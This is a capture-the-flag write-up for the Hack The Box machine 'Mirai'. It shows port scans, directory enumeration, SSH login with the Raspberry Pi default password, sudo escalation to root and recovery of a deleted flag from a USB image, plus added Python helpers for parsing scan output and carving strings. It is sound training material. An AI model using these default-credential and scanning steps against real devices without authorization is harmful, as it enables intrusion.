Mirai
Ports scan
masscan
root@kali:~/HTB/Machines/Mirai# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.48 --rate=1000
Starting masscan 1.0.5 at 2019-11-19 19:06:47 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 32469/tcp on 10.10.10.48
Discovered open port 22/tcp on 10.10.10.48
Discovered open port 32414/udp on 10.10.10.48
Discovered open port 32400/tcp on 10.10.10.48
Discovered open port 1479/tcp on 10.10.10.48
Discovered open port 53/tcp on 10.10.10.48
Discovered open port 80/tcp on 10.10.10.48
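Turning the masscan hits into the nmap port list by hand is error-prone, so here is an added example (not from the original writeup) that parses the "Discovered open port" lines and builds the follow-up nmap command. The sample input is the masscan output above, re-typed one hit per line; the parser also copes with output that has been flattened onto a single line.

```python
import re
from collections import defaultdict

# Constructed sample: the "Discovered open port" lines from the masscan run above.
SAMPLE_MASSCAN_OUTPUT = """\
Discovered open port 32469/tcp on 10.10.10.48
Discovered open port 22/tcp on 10.10.10.48
Discovered open port 32414/udp on 10.10.10.48
Discovered open port 32400/tcp on 10.10.10.48
Discovered open port 1479/tcp on 10.10.10.48
Discovered open port 53/tcp on 10.10.10.48
Discovered open port 80/tcp on 10.10.10.48
"""

DISCOVERED = re.compile(r"Discovered open port (\d+)/(tcp|udp) on (\S+)")

def parse_masscan(output):
    """Map host -> {"tcp": [...], "udp": [...]} (sorted, de-duplicated).
    Matching over the whole text also works when the output lost its newlines."""
    hosts = defaultdict(lambda: {"tcp": set(), "udp": set()})
    for port, proto, host in DISCOVERED.findall(output):
        hosts[host][proto].add(int(port))
    return {h: {p: sorted(s) for p, s in v.items()} for h, v in hosts.items()}

def nmap_port_spec(ports):
    """nmap -p syntax. Bare numbers apply to every protocol being scanned, so once
    UDP ports are present the TCP ones get an explicit T: prefix to stay TCP-only."""
    tcp = ",".join(str(p) for p in ports["tcp"])
    udp = ",".join(str(p) for p in ports["udp"])
    if tcp and udp:
        return f"T:{tcp},U:{udp}"
    return f"U:{udp}" if udp else tcp

def nmap_command(host, ports):
    """argv for the service scan. A scan type is added per protocol present:
    without -sU, nmap warns that the U: ports in -p will be ignored."""
    argv = ["nmap", "-sC", "-sV"]
    if ports["tcp"]:
        argv.append("-sS")
    if ports["udp"]:
        argv.append("-sU")
    return argv + ["-p" + nmap_port_spec(ports), host]

if __name__ == "__main__":
    for host, ports in parse_masscan(SAMPLE_MASSCAN_OUTPUT).items():
        print(" ".join(nmap_command(host, ports)))
```

The nmap command in the next section lists U:32414 but omits -sU, so that UDP port was never actually probed; the generated command adds -sU whenever masscan reported a UDP hit.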
nmap
root@kali:~/HTB/Machines/Mirai# nmap -sC -sV -p22,53,80,1479,32469,32400,U:32414 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-19 14:14 EST
Nmap scan report for mirai.htb (10.10.10.48)
Host is up (0.044s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid:
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Website Blocked
1479/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.33 seconds
Web
The web server seems to be a Pi-hole 3.1.4 (https://en.wikipedia.org/wiki/Pi-hole). It's written in PHP and bash, and it blocks advertising by acting as a DNS sinkhole.
It is designed for use on embedded devices with network capability, such as the Raspberry Pi, but it can be used on other machines running Linux and cloud implementations.
root@kali:~/HTB/Machines/Mirai# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 100 -u http://mirai.htb

dirsearch v0.3.8

Extensions: php, txt | HTTP method: get | Threads: 100 | Wordlist size: 661562

Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-25_08-15-16.log

Target: http://mirai.htb

[08:15:17] Starting:
[08:15:23] 200 -  14KB - /admin/
[08:16:35] 200 -   13B - /versions/

Task Completed
The second web server, on port 32400, is a Plex media server.
The /admin/ folder found by the dirsearch enumeration exposes the Pi-hole admin console.
User Flag
The previous findings indicate that we are facing a Raspberry Pi. Let's try the default credentials (user pi, password raspberry).
root@kali:~# ssh pi@mirai.htb
The authenticity of host 'mirai.htb (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'mirai.htb' (ECDSA) to the list of known hosts.
pi@mirai.htb's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ cat Desktop/user.txt
<USER_FLAG>
Root flag
Usually the pi user has sudo rights.
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
pi@raspberrypi:~/Desktop $ sudo -i

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
It was too easy.
root@raspberrypi:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  4.8M   96M   5% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shme
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000
root@raspberrypi:~# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls -ltr
total 13
drwx------ 2 root root 12288 Aug 14  2017 lost+found
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back?
-James
Playing hide and seek :)
root@raspberrypi:/media/usbstick# cd ..
Dump the whole device to a file.
root@raspberrypi:/media# dd if=/dev/sdb of=img
20480+0 records in
20480+0 records out
10485760 bytes (10 MB) copied, 0.077273 s, 136 MB/s
Look inside the image for human-readable strings: deleting a file only removes its directory entry, so the data blocks are still on the disk until they are reused.
root@raspberrypi:/media# strings img
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
<ROOT_FLAG>
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
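Rather than eyeballing the strings output, the same carve can be scripted with byte offsets, which is what tells you which block a deleted file lived in. This is an added example, not part of the original writeup: the image is a constructed 64 KiB sample (hypothetical layout, not real ext2 block positions) with the directory names and two data blocks planted in random filler, standing in for the dd dump above.

```python
import random
import re

# Constructed layout for the sample image (hypothetical, not real ext2 block positions)
DIR_BLOCK, CONTENT_BLOCK, NOTE_BLOCK = 8192, 20480, 24576
ROOT_TXT_CONTENT = b"CONSTRUCTED-SAMPLE-FLAG-VALUE\n"
NOTE_CONTENT = b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"

def _place(img, offset, data):
    """Write data at offset, with a NUL on each side so the run is cleanly delimited."""
    img[offset - 1:offset + len(data) + 1] = b"\x00" + data + b"\x00"

def build_sample_image(size=65536, seed=1):
    """A 64 KiB 'dd of the USB stick': random filler plus the directory names and two
    data blocks. Unlinking a file frees its blocks but does not wipe them, so the
    text of root.txt is still there for strings(1) to find."""
    rng = random.Random(seed)
    img = bytearray(rng.getrandbits(8) for _ in range(size))
    _place(img, DIR_BLOCK, b"lost+found\x00root.txt\x00damnit.txt")
    _place(img, CONTENT_BLOCK, ROOT_TXT_CONTENT)
    _place(img, NOTE_BLOCK, NOTE_CONTENT)
    return bytes(img)

def carve_strings(image, min_len=4):
    """What `strings` does: every run of >= min_len printable ASCII bytes, plus its
    byte offset in the image (`strings -t x` prints the same offsets in hex)."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pat.finditer(image)]

def find_strings(image, pattern, min_len=4):
    """Filter the carved strings by regex; the offset shows where each hit sits,
    so a hit can be tied back to the block a deleted file occupied."""
    rx = re.compile(pattern)
    return [(off, s) for off, s in carve_strings(image, min_len) if rx.search(s)]

if __name__ == "__main__":
    img = build_sample_image()
    print(f"{len(carve_strings(img))} printable runs (most are noise from the filler)")
    for off, s in find_strings(img, r"\.txt$|^Damnit|FLAG"):
        print(f"{off:#08x}  {s}")
```

On a real dump, the short junk runs such as ">r &" in the output above are exactly that filler noise; filtering by a pattern or a longer min_len removes most of it.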
References
Daniel Simao 18:03, 21 November 2019 (EST)